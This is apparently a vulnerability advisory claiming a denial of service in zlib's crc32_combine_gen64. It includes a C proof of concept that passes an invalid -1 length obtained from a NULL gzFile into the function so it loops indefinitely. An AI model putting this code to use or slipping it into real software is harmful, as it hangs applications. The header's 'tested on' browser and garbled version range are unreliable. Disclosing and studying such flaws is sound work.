=============================================================================================================================================
| # Title     : zlib via Infinite Loop in crc32_combine_gen64 Denial of Service                                                             |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.3 (64 bits)                                                            |
| # Vendor    : https://github.com/madler/zlib                                                                                              |
=============================================================================================================================================

[+] Summary    :  A vulnerability in zlib affected from 0 before 1.3.2  can lead to a Denial of Service (DoS) condition due to an infinite loop in the crc32_combine_gen64() function.

The issue occurs when an invalid length value (specifically -1, interpreted as 0xFFFFFFFFFFFFFFFF in unsigned 64-bit form) is passed to the function. This can happen if a program:

Calls gzopen() with invalid parameters.

Fails to properly validate the returned gzFile pointer.

Calls gzoffset64() on a NULL pointer.

Passes the resulting invalid length to crc32_combine_gen64().

When this malformed value is processed, the internal bitwise loop logic in crc32_combine_gen64() fails to terminate, resulting in 100% CPU consumption and an infinite loop.

This vulnerability does not allow remote code execution or privilege escalation. The impact is limited to resource exhaustion (CPU) within applications that improperly validate zlib function return values.

[+] POC   : 

#include <zlib.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

void create_dummy_file(const char* filename) {
    FILE *fp = fopen(filename, "w");
    if (!fp) {
        perror("Failed to create file");
        exit(1);
    }
    fprintf(fp, "This is a test file for the vulnerability exploit");
    fclose(fp);
    printf("[+] Test file created: %s\n", filename);
}

int main(int argc, char *argv[]) {
    const char *target_file = "poc_test.gz";
    
    printf("========================================\n");
    printf("    zlib Exploit by indoushka       \n");
    printf("    DoS via Infinite Loop in crc32_combine_gen64\n");
    printf("========================================\n\n");

    create_dummy_file(target_file);

    printf("[*] Attempting to open the file incorrectly...\n");
    gzFile file = gzopen(target_file, "");
    
    if (file == NULL) {
        printf("[OK] Success: gzopen returned NULL as expected\n");
    } else {
        printf("[!] Failure: gzopen did not return NULL (unexpected)\n");
        gzclose(file);
        return 1;
    }

    printf("[*] Calling gzoffset64 on a NULL pointer...\n");
    z_off64_t malicious_len = gzoffset64(file);
    
    printf("[*] Value returned from gzoffset64: %lld (0x%llx)\n", 
           (long long)malicious_len, (unsigned long long)malicious_len);
    
    if (malicious_len == (z_off64_t)-1) {
        printf("[OK] Success: Obtained value -1 (0xFFFFFFFFFFFFFFFF)\n");
    }
    printf("\n[!] Calling crc32_combine_gen64 with the poisoned value...\n");
    printf("[!] This will cause the program to enter an infinite loop!\n");
    printf("[!] CPU consumption starts now... Press Ctrl+C to stop\n");
    printf("----------------------------------------\n");
  
    uLong result = crc32_combine_gen64(malicious_len);

    printf("CRC Result: %lu\n", result);
    gzclose(file);
    remove(target_file);
    
    return 0;
}

Greetings to :======================================================================
jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|
====================================================================================